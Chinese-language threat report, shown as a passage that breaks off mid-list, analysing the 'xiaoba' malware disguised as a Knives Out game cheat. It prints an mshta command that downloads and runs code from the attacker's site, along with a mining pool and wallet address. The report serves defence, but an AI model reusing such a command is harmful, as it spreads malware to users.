装游戏辅助本想吃鸡，中挖矿病毒卡到死机

近日，腾讯御见威胁情报中心监控到“xiaoba”勒索病毒的作者在网站xiaobaruanjian.xyz上提供荒野行动游戏辅助，同时将勒索病毒、挖矿木马、篡改主页木马暗藏在其中，一旦下载运行了该网站的所谓吃鸡“辅助”软件，会导致浏览器主页被篡改、电脑CPU被大量占用挖矿。

如果碰巧遇到中毒电脑有比特币、以太坊交易，病毒还会监视剪切板，当中毒电脑上发生比特币、以太坊币交易时，病毒会在交易瞬间将收款人地址替换为自己的，从而实现虚拟币交易抢劫。

更恶劣的是，xiaoba病毒作者还增加了勒索病毒功能，会改写硬盘主引导记录（MBR），让电脑无法开机，要求受害人加QQ聊天付款后才能解除病毒封锁。

伪装成吃鸡游戏辅助工具的“荒野行动设备解封工具.cmd”，被打包为压缩包文件“荒野行动设备解封工具.exe”，该压缩包文件执行时会启动恶意脚本cmd。

“荒野行动设备解封工具.cmd”执行命令mshta.exe hxxp://xiaobaruanjian.xyz/XiaoBa/office 

hxxp://xiaobaruanjian.xyz/XiaoBa/office下载木马exe，木马伪装正规软件文件名。

木马运行后创建傀儡进程svchost.exe

木马从自身资源中获取PE ,然后将其写入傀儡进程

傀儡进程执行恶意代码，下载木马到Temp目录，修改文件创建时间，然后执行木马文件。

木马的各个子模块文件下载地址皆以base64加密形式保存在代码中，木马运行时解码出对应的URL,下载文件并启动进程。URL、进程、文件以及功能对应如下：

木马运行时的http请求

矿池一：emergency.fee.xmrig.com 

钱包一：48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD 

钱包状态：